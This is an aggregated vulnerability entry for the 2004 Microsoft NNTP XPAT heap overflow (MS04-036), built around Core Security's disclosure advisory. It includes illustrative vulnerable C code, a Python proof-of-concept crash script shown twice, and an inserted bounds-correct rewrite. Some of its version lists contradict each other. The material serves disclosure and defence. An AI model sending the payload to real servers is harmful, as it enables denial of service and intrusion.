CVE-2004-0574
CVSS 10.0
Published: 2004-11-03 00:00:00
Revised: 2016-10-17 22:46:13

[Original] The Network News Transfer Protocol (NNTP) component of Microsoft Windows NT Server 4.0, Windows 2000 Server, Windows Server 2003, Exchange 2000 Server, and Exchange Server 2003 allows remote attackers to execute arbitrary code via XPAT patterns, possibly related to improper length validation and an "unchecked buffer," leading to off-by-one and heap-based buffer overflows.


[CNNVD] Microsoft NNTP XPAT Command Remote Buffer Overflow Vulnerability (MS04-036) (CNNVD-200411-018)

        
The Microsoft NNTP component provides newsgroup server support.
The Microsoft NNTP server lacks proper buffer bounds checking when handling the XPAT command; a remote attacker can exploit this vulnerability to execute arbitrary instructions on the system with the privileges of the service process.
The XPAT command is used to retrieve specific header fields from specified articles; its syntax is:
XPAT header range|<message-id> pat [pat...]
The problem lies in XPAT's handling of user-supplied ASCII values, which are converted to 2-byte characters and stored in a buffer. The NNTP service allocates a 4000-byte buffer to hold the XPAT query translated into 2-byte character format and tracks how much of it remains with a global counter initialised to '2000'. Because the comparison against this variable is not handled correctly, an off-by-two heap overflow can occur; carefully crafted input may allow arbitrary instructions to be executed on the system with the privileges of the service process.
        

- CVSS (Base Score)

CVSS score: 10 [Critical (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (Affected platforms and products)

cpe:/o:microsoft:windows_nt:4.0::server
cpe:/a:microsoft:exchange_server:2000  Microsoft exchange_srv 2000
cpe:/o:microsoft:windows_2000:::server
cpe:/o:microsoft:windows_2003_server:r2
cpe:/a:microsoft:exchange_server:2003  Microsoft exchange_srv 2003

- OVAL (Technical details for detection)

oval:org.mitre.oval:def:5926  Windows 2000 NNTP Component Buffer Overflow
oval:org.mitre.oval:def:5070  Windows NT NNTP Component Buffer Overflow
oval:org.mitre.oval:def:5021  Vulnerability in NNTP Could Allow Remote Code Execution
oval:org.mitre.oval:def:4392  Windows Server 2003 NNTP Component Buffer Overflow
oval:org.mitre.oval:def:246  Network News Transfer Protocol Buffer Overflow
*OVAL describes in detail how to detect this vulnerability; further technical details on detecting it can be found in the related OVAL definitions.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0574
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0574
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200411-018
(Official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=109761632831563&w=2
(UNKNOWN)  BUGTRAQ  20041012 CORE-2004-0802: IIS NNTP Service XPAT Command Vulnerabilities
http://www.ciac.org/ciac/bulletins/p-012.shtml
(VENDOR_ADVISORY)  CIAC  P-012
http://www.coresecurity.com/common/showdoc.php?idx=420&idxseccion=10
(UNKNOWN)  MISC  http://www.coresecurity.com/common/showdoc.php?idx=420&idxseccion=10
http://www.kb.cert.org/vuls/id/203126
(VENDOR_ADVISORY)  CERT-VN  VU#203126
http://www.microsoft.com/technet/security/bulletin/ms04-036.asp
(VENDOR_ADVISORY)  MS  MS04-036
http://xforce.iss.net/xforce/xfdb/17641
(VENDOR_ADVISORY)  XF  win-nntp-bo(17641)
http://xforce.iss.net/xforce/xfdb/17661
(UNKNOWN)  XF  win-ms04036-patch(17661)

- Vulnerability information

Microsoft NNTP XPAT Command Remote Buffer Overflow Vulnerability (MS04-036)
Critical  Boundary condition error
2004-11-03 00:00:00 2005-10-20 00:00:00
Remote
        
The Microsoft NNTP component provides newsgroup server support.
The Microsoft NNTP server lacks proper buffer bounds checking when handling the XPAT command; a remote attacker can exploit this vulnerability to execute arbitrary instructions on the system with the privileges of the service process.
The XPAT command is used to retrieve specific header fields from specified articles; its syntax is:
XPAT header range|<message-id> pat [pat...]
The problem lies in XPAT's handling of user-supplied ASCII values, which are converted to 2-byte characters and stored in a buffer. The NNTP service allocates a 4000-byte buffer to hold the XPAT query translated into 2-byte character format and tracks how much of it remains with a global counter initialised to '2000'. Because the comparison against this variable is not handled correctly, an off-by-two heap overflow can occur; carefully crafted input may allow arbitrary instructions to be executed on the system with the privileges of the service process.
        

- Advisories and patches

        Vendor patches:
        Microsoft
        ---------
        Microsoft has released a security bulletin (MS04-036) and the corresponding patches:
        MS04-036: Vulnerability in NNTP Could Allow Remote Code Execution (883935)
        Link:
        http://www.microsoft.com/technet/security/bulletin/MS04-036.mspx

        Patch downloads:
        Microsoft Windows NT Server 4.0 Service Pack 6a
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=0126B7AC-9C78-45C5-8AC7-E0E8CA4B6DEE

        
        Microsoft Windows 2000 Server Service Pack 3 and Microsoft Windows 2000 Server Service Pack 4
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=54A86560-4A0C-4E2F-A137-D8EE905A674A

        
        Microsoft Windows Server 2003
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=DCB1CB73-A426-40D8-BD14-B458C7915815

        
        Microsoft Windows Server 2003 64-Bit Edition
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=1A8C4D7A-2F85-4CDD-8CC9-E2E1817403DF

- Vulnerability information (578)

MS Windows NNTP Service (XPAT) Denial of Service Exploit (MS04-036) (EDBID:578)
windows dos
2004-10-16 Verified
0 Lucas Lavarello
N/A
#--
# IIS NNTP Service XPAT command heap overflow proof of concept
#
# Author:
#    Lucas Lavarello (lucas at coresecurity dot com)
#    Juliano Rizzo   (juliano at coresecurity dot com)
#
# Copyright (c) 2001-2004 CORE Security Technologies, CORE SDI Inc.
# All rights reserved.
#
# THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED. IN NO EVENT SHALL CORE SDI Inc. BE LIABLE
# FOR ANY DIRECT,  INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY OR
# CONSEQUENTIAL DAMAGES RESULTING FROM THE USE OR MISUSE OF
# THIS SOFTWARE
#
# www coresecurity com
#--
from socket import * 

host = "127.0.0.1"
pat = "C"*1946  + " " + "X"*10

newsgroup = "control.newgroup"

sock = socket(AF_INET, SOCK_STREAM)
sock.connect((host, 119))

print sock.recv(512)

sock.send("group %s\x0d\x0a" % newsgroup)

print sock.recv(512)

sock.send("xpat From 1-9 %s \x0d\x0a" % pat)


# milw0rm.com [2004-10-16]
		

- Vulnerability information (F34648)

Core Security Technologies Advisory 2004.0802 (PacketStormID:F34648)
2004-10-13 00:00:00
Core Security Technologies,Lucas Lavarello,Juliano Rizzo  coresecurity.com
advisory,arbitrary,tcp,vulnerability,protocol
CVE-2004-0574

Core Security Technologies Advisory ID: CORE-2004-0802 - Microsoft IIS provides organizations using it with the ability to service and route news using the Network News Transfer Protocol (NNTP) with the Microsoft NNTP service listening on port 119/tcp, and optionally on port 563/tcp for SSL encrypted connections. Multiple vulnerabilities were found in Microsoft IIS that could allow an attacker to execute arbitrary commands on vulnerable systems running the Microsoft IIS NNTP service.

Core Security Technologies Advisory
                     http://www.coresecurity.com

            IIS NNTP Service XPAT Command Vulnerabilities



Date Published: 2004-10-12

Last Update: 2004-10-12

Advisory ID: CORE-2004-0802

Bugtraq ID: Not assigned

CVE Name: CAN-2004-0574

Title: IIS NNTP Service XPAT Command Vulnerabilities

Class: Boundary error condition

Remotely Exploitable: Yes

Locally Exploitable: Yes

Advisory URL:
 http://www.coresecurity.com/common/showdoc.php?idx=420&idxseccion=10

Vendors contacted:
- Microsoft
  . 2004-08-16 Core Security Technologies sent draft advisory to vendor
  . 2004-08-16 Microsoft MSRC acknowledgement received
  . 2004-10-12 Microsoft releases a fix (MS04-036)
 
Release Mode: COORDINATED RELEASE


*Vulnerability Description:*

 Microsoft IIS provides organizations using it with the ability to
 service and route news using the Network News Transfer Protocol (NNTP)
 with the Microsoft NNTP service listening on port 119/tcp, and
 optionally on port 563/tcp for SSL encrypted connections.

 Multiple vulnerabilities were found in Microsoft IIS that could allow
 an attacker to execute arbitrary commands on vulnerable systems
 running the Microsoft IIS NNTP service.

 The Network News Transfer Protocol (NNTP) is fully described in
 RFC 977 [1]:
 "NNTP specifies a protocol for the distribution, inquiry, retrieval,
 and posting of news articles using a reliable stream-based
 transmission of news among the ARPA-Internet community.
 NNTP is designed so that news articles are stored in a central database
 allowing a subscriber to select only those items he wishes to read.
 Indexing, cross-referencing, and expiration of aged messages are also
 provided".

*Vulnerable Packages:*

. Microsoft Windows NT Server 4.0 Service Pack 6a NNTP component
. Microsoft Windows 2000 Server Service Pack 3 NNTP component
  and Microsoft Windows 2000 Server Service Pack 4 NNTP component
. Microsoft Windows Server 2003 NNTP Component
. Microsoft Windows Server 2003 64-Bit Edition NNTP Component

*Solution/Vendor Information/Workaround:*

 A fix for the vulnerabilities reported in this advisory is available
 as a Microsoft Security update at:
 http://www.microsoft.com/technet/security/bulletin/MS04-036.mspx

 A workaround is to disable the NNTP service. This will prevent attackers
 from exploiting the discovered vulnerabilities but will also make the
 NNTP services unavailable for legitimate users.

*Credits:*

 These vulnerabilities were found by Lucas Lavarello and Juliano Rizzo
 from Core Security Technologies.

*Technical Description - Exploit/Concept Code:*

 The Network News Transfer Protocol supports a number of different
 extensions. Extensions are described in RFC 2980 [2].
 
 This advisory is focused on the XPAT command.
 "The XPAT command is used to retrieve specific headers from specific
 articles, based on pattern matching on the contents of the header".

 The syntax of the XPAT command is:
 XPAT header range|<message-id> pat [pat...]

 The XPAT command doesn't require previous user authentication and
 hence we believe this should be considered a high risk vulnerability.
 
 The vulnerabilities were found in the parser and query translator of
 the XPAT command within the Network News Transfer Protocol service.

 The NNTP service translates calls to the XPAT command into an internal
 query format. As stated in its calling syntax, it accepts multiple
 patterns. Patterns as well as other parameters are delimited by tab
 and space characters.

 The vulnerabilities found reside in the methods that take care of
 parsing user-supplied ASCII values and append them translated to
 2-byte characters, as part of an internal query buffer.

 For better understanding, we have created example versions of the
 vulnerable methods. When compiled, these may not match their original
 versions exactly, but they are meant to be taken as illustrative
 examples.

 The NNTP service allocates a 4000 bytes buffer that it uses to store
 the translated XPAT query to a 2-byte character format. It keeps track
 of how many words are left in the buffer using a global counter
 initially set to the value of '2000'. A pointer to the buffer as well
 as a pointer to the counter are used in every call to the vulnerable
 string-appending methods which take care of updating those values for
 any future calls.

 The methods differ if called for user-supplied pattern data or internal
 query language keywords. In both cases, incorrect bounds checking is
 performed, leading to off-by-two, off-by-four and heap overflow
 vulnerabilities.

 The following example demonstrates the miscalculations made in the
 method used to append internal query language keywords to the global
 destination buffer.

----------------------------------------------------------------------
// The wstringappendkeyword function.
//  input:
//    pdestbuf - a pointer to pointer to a wchar destination buffer
//    srcbuf - a pointer to a char source buffer
//    spaceleft - a pointer to an integer with the amount of bytes left
//
//  output:
//    pdestbuf - the pointer to pointer is updated to point after
//               the copied bytes
//    spaceleft - the integer is updated subtracting the amount of
//                copied bytes.
//
//  returns:
//    1 on OK
//    0 on FAIL - if there isn't enough space in the destination buffer

int wstringappendkeyword (short **pdestbuf, char *srcbuf, unsigned int *spaceleft)
{
unsigned int count = 0;
short *destbuf = *pdestbuf;

    if (srcbuf[count] != 0x00) {

        do {
            // Defective bounds check: count == *spaceleft passes, so the
            // write below lands one word (2 bytes) past the end of destbuf.
            if (count > *spaceleft) {
                //...
                //not_enough_space handling code
                //...
                return 0;
            }

            destbuf[count] = (short)srcbuf[count];
            count++;

        } while(srcbuf[count] != 0x00);
    }

    // When count == *spaceleft + 1 this unsigned subtraction wraps to
    // 0xFFFFFFFF, disabling the check for every later call.
    *spaceleft -= count;
    *pdestbuf += count;

    return 1;
}
----------------------------------------------------------------------

 As seen above, the function is checking 'count' to be only bigger than
 the amount of words left in the destination buffer. In the case of
 count being equal to the value pointed by the 'spaceleft' variable,
 2 bytes would be written past the end of destbuf's buffer.

 In its last iteration, the loop will check 'count' to be bigger than the
 amount of words and fail, aborting the whole call to the command.

 By passing a specific amount of bytes in the 'srcbuf' buffer, an
 attacker could break free from the copy loop before the 'spaceleft'
 check is done, decrementing the 'spaceleft' variable. Subtracting one
 from zero causes an unsigned integer variable to wrap under to
 0xFFFFFFFF, bypassing the existing defective bounds check. This way,
 any further attempts to copy data into the internal query buffer using
 this function will lead to a controllable heap overflow.

 The only barrier for exploitation is that this function is only called
 for appending hardcoded query language keywords to the buffer. This is
 where the next vulnerable method takes place.

 The rest of the vulnerabilities reside in the method used for translating
 and appending user-supplied patterns. The situation is similar to
 the one shown above except that the 'srcbuf' pointer holds data that is
 100% controllable by an attacker and that the method is called
 sequentially for each supplied pattern.

 You will also notice this procedure permits an attacker to overwrite
 4 bytes past the end of 'destbuf' buffer introducing an off-by-four
 vulnerability.

----------------------------------------------------------------------
// The wstringappendpatterns function.
//  input:
//    pdestbuf - a pointer to pointer to a wchar destination buffer
//    srcbuf - a pointer to a char source buffer
//    spaceleft - a pointer to an integer with the amount of bytes left
//
//  output:
//    pdestbuf - the pointer to pointer is updated to point after the
//               copied bytes
//    spaceleft - the integer is updated subtracting the amount of
//                copied bytes.
//
//  returns:
//    1 on OK
//    0 on FAIL - if there isn't enough space in the destination buffer


int wstringappendpatterns (short **pdestbuf, char *srcbuf, unsigned int *spaceleft)
{
unsigned int count = 0;
short *destbuf = *pdestbuf;

    while (srcbuf[count] != 0x00) {

        // Same defective check as above: count == *spaceleft passes.
        if (count > *spaceleft) {
            //...
            //not_enough_space handling code
            //...
            return 0;
        }


        if (srcbuf[count] == '[') {
            // Two words are written under a single check, so up to
            // 4 bytes can land past the end of destbuf (off-by-four).
            destbuf[count] = (short)'|';
            count++;
            destbuf[count] = (short)'[';

        } else {
            destbuf[count] = (short)srcbuf[count];
        }

        count++;
    }

    // count may exceed *spaceleft by one or two here, wrapping the
    // counter to 0xFFFFFFFF or 0xFFFFFFFE.
    *spaceleft -= count;
    *pdestbuf += count;

    return 1;
}
----------------------------------------------------------------------

 Once again, having decremented spaceleft 'count' times, an attacker
 could make the value of the global remaining-words counter wrap under
 to 0xFFFFFFFF or 0xFFFFFFFE. By crafting multiple patterns of a
 specific length, an attacker could cause a controllable Heap overflow.
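For contrast with the two defective methods above, the following is an added example of a bounds-correct appender written for this page; it is not Microsoft's code and not part of the Core advisory. The function names (`wstringappendpatterns_safe`, `xpat_translate_patterns`), the tokenizer and the sample inputs are assumptions made for the illustration. It fixes the two defects the advisory describes: the space requirement of the whole pattern (counting the two-word expansion of '[') is computed before anything is written and compared with `>` against the exact count, so a pattern that exactly fills the buffer is accepted while one word more is refused, and because nothing is written or subtracted on refusal the shared counter can never wrap below zero.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Added example: a bounds-correct rewrite of the advisory's pattern
 * appender. Function names, the tokenizer and all inputs are assumptions
 * made for this illustration; this is neither Microsoft's code nor the
 * advisory's. The destination is a buffer of 16-bit words and *spaceleft
 * counts the words still free in it. */

/* Words needed to translate len bytes of pattern text: every byte becomes
 * one word and '[' expands to the two-word sequence "|[". */
static size_t translated_words(const char *src, size_t len)
{
    size_t words = 0;
    for (size_t i = 0; i < len; i++)
        words += (src[i] == '[') ? 2 : 1;
    return words;
}

/* Core appender. The full requirement is checked before the buffer is
 * touched: needed == *spaceleft exactly fills it and is allowed, one word
 * more is refused. Since needed never exceeds *spaceleft on the write
 * path, the unsigned subtraction cannot wrap. On failure nothing is
 * written and neither out-parameter changes. */
static int append_translated(short **pdestbuf, const char *src, size_t len,
                             unsigned int *spaceleft)
{
    size_t needed = translated_words(src, len);
    if (needed > *spaceleft)
        return 0;

    short *destbuf = *pdestbuf;
    size_t out = 0;
    for (size_t i = 0; i < len; i++) {
        if (src[i] == '[') {
            destbuf[out++] = (short)'|';
            destbuf[out++] = (short)'[';
        } else {
            destbuf[out++] = (short)(unsigned char)src[i];
        }
    }
    *spaceleft -= (unsigned int)needed;
    *pdestbuf += needed;
    return 1;
}

/* Same calling convention as the advisory's wstringappendpatterns. */
int wstringappendpatterns_safe(short **pdestbuf, const char *srcbuf,
                               unsigned int *spaceleft)
{
    return append_translated(pdestbuf, srcbuf, strlen(srcbuf), spaceleft);
}

/* Translate a whole space/tab-delimited XPAT pattern list into `query`
 * (capacity budget_words words) under one shared budget, mirroring the
 * single remaining-words counter the service shares across patterns.
 * Returns how many patterns were appended; stops at the first one that
 * does not fit and reports the remaining words through *words_left. */
int xpat_translate_patterns(const char *args, short *query,
                            unsigned int budget_words, unsigned int *words_left)
{
    short *dest = query;
    unsigned int left = budget_words;
    int appended = 0;
    const char *p = args;

    while (*p != '\0') {
        while (*p == ' ' || *p == '\t')      /* skip delimiters */
            p++;
        if (*p == '\0')
            break;
        const char *start = p;
        while (*p != '\0' && *p != ' ' && *p != '\t')
            p++;
        if (!append_translated(&dest, start, (size_t)(p - start), &left))
            break;
        appended++;
    }
    *words_left = left;
    return appended;
}

int main(void)
{
    /* Constructed input: a six-word budget. The first pattern needs five
     * words (a, b, |, [, c) and fits; the second needs two and is refused. */
    short query[6];
    unsigned int left = 0;
    int n = xpat_translate_patterns("ab[c de", query, 6, &left);
    printf("appended %d pattern(s), %u word(s) left\n", n, left);
    return 0;
}
```

The design point is that the check is made against the translated length of the whole token rather than against a running index inside the copy loop, which is what let the original admit the `count == *spaceleft` case and then drive the counter below zero.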

 The following proof-of-concept code written in Python demonstrates the
 problems.

----------------------------------------------------------------------
#--
# IIS NNTP Service XPAT command heap overflow proof of concept
#
# Author:
#   Lucas Lavarello (lucas at coresecurity dot com)
#   Juliano Rizzo   (juliano at coresecurity dot com)
#
# Copyright (c) 2001-2004 CORE Security Technologies, CORE SDI Inc.
# All rights reserved.
#
# THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED. IN NO EVENT SHALL CORE SDI Inc. BE LIABLE
# FOR ANY DIRECT,  INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY OR
# CONSEQUENTIAL DAMAGES RESULTING FROM THE USE OR MISUSE OF
# THIS SOFTWARE
#
# http://www.coresecurity.com
#--

from socket import *

host = "127.0.0.1"
pat = "C"*1946  + " " + "X"*10

newsgroup = "control.newgroup"

sock = socket(AF_INET, SOCK_STREAM)
sock.connect((host, 119))

print sock.recv(512)

sock.send("group %s\x0d\x0a" % newsgroup)

print sock.recv(512)

sock.send("xpat From 1-9 %s \x0d\x0a" % pat)
----------------------------------------------------------------------

*References*

 [1] RFC 977: Network News Transfer Protocol
     http://www.faqs.org/rfcs/rfc977.html

 [2] RFC 2980: Common NNTP Extensions
     http://www.faqs.org/rfcs/rfc2980.html

*About Core Security Technologies*

 Core Security Technologies develops strategic security solutions for
 Fortune 1000 corporations, government agencies and military
 organizations. The company offers information security software and
 services designed to assess risk and protect and manage information
 assets.
 Headquartered in Boston, MA, Core Security Technologies can be reached
 at 617-399-6980 or on the Web at http://www.coresecurity.com.

 To learn more about CORE IMPACT, the first comprehensive penetration
 testing product, visit:
 http://www.coresecurity.com/products/coreimpact

*DISCLAIMER:*

 The contents of this advisory are copyright (c) 2004 CORE Security
 Technologies and may be distributed freely provided that no fee is
 charged for this distribution and proper credit is given.

$Id: iis-nntp-advisory.txt,v 1.7 2004/10/12 18:33:16 carlos Exp $

    

- Vulnerability information

10697
Microsoft Windows/Exchange NNTP Component Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public Vendor Verified

- Vulnerability description

A remote overflow exists in Windows and Exchange. The NNTP server fails to validate user-supplied data passed as a parameter to the XPAT command resulting in a buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.

- Timeline

2004-10-12 2004-08-16
2004-10-12 2004-10-12

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

- References

- Vulnerability author

- Vulnerability information

Microsoft NNTP Component Heap Overflow Vulnerability
Boundary Condition Error 11379
Yes No
2004-10-12 12:00:00 2009-07-12 07:06:00
Discovery is credited to Lucas Lavarello and Juliano Rizzo from Core Security Technologies.

- Affected program versions

Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Enterprise Edition Itanium 0
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Datacenter Edition Itanium 0
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows NT Server 4.0 SP6a
+ Avaya DefinityOne Media Servers
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
+ Avaya S8100 Media Servers 0
Microsoft Windows NT Server 4.0 SP6
Microsoft Windows NT Server 4.0 SP5
Microsoft Windows NT Server 4.0 SP4
Microsoft Windows NT Server 4.0 SP3
Microsoft Windows NT Server 4.0 SP2
Microsoft Windows NT Server 4.0 SP1
Microsoft Windows NT Server 4.0
Microsoft Windows NT Enterprise Server 4.0 SP6a
Microsoft Windows NT Enterprise Server 4.0 SP6
Microsoft Windows NT Enterprise Server 4.0 SP5
Microsoft Windows NT Enterprise Server 4.0 SP4
Microsoft Windows NT Enterprise Server 4.0 SP3
Microsoft Windows NT Enterprise Server 4.0 SP2
Microsoft Windows NT Enterprise Server 4.0 SP1
Microsoft Windows NT Enterprise Server 4.0
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Datacenter Server SP3
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server
Microsoft Exchange Server 2003 SP1
Microsoft Exchange Server 2003
Microsoft Exchange Server 2000 SP3
Microsoft Exchange Server 2000 SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
Microsoft Exchange Server 2000 SP1
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
Microsoft Exchange Server 2000
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
Avaya S8100 Media Servers 0
+ Microsoft Windows 2000 Server
+ Microsoft Windows NT Server 4.0 SP6a
Avaya S3400 Message Application Server 0
+ Microsoft Windows 2000 Server
Avaya Modular Messaging (MSS) 2.0
Avaya Modular Messaging (MSS) 1.1
Avaya IP600 Media Servers
Avaya DefinityOne Media Servers
Microsoft Exchange Server 5.5 SP4
- Microsoft BackOffice 4.5
- Microsoft BackOffice 4.5
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0
Microsoft Exchange Server 5.5 SP3
- Microsoft BackOffice 4.5
- Microsoft BackOffice 4.5
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0
Microsoft Exchange Server 5.5 SP2
- Microsoft BackOffice 4.5
- Microsoft BackOffice 4.5
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0
Microsoft Exchange Server 5.5 SP1
- Microsoft BackOffice 4.5
- Microsoft BackOffice 4.5
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0
Microsoft Exchange Server 5.5
- Microsoft BackOffice 4.5
- Microsoft BackOffice 4.5
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0
Microsoft Exchange Server 5.0 SP2
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0
Microsoft Exchange Server 5.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0
Microsoft Exchange Server 5.0
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0

- Unaffected program versions

Microsoft Exchange Server 5.5 SP4
- Microsoft BackOffice 4.5
- Microsoft BackOffice 4.5
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0
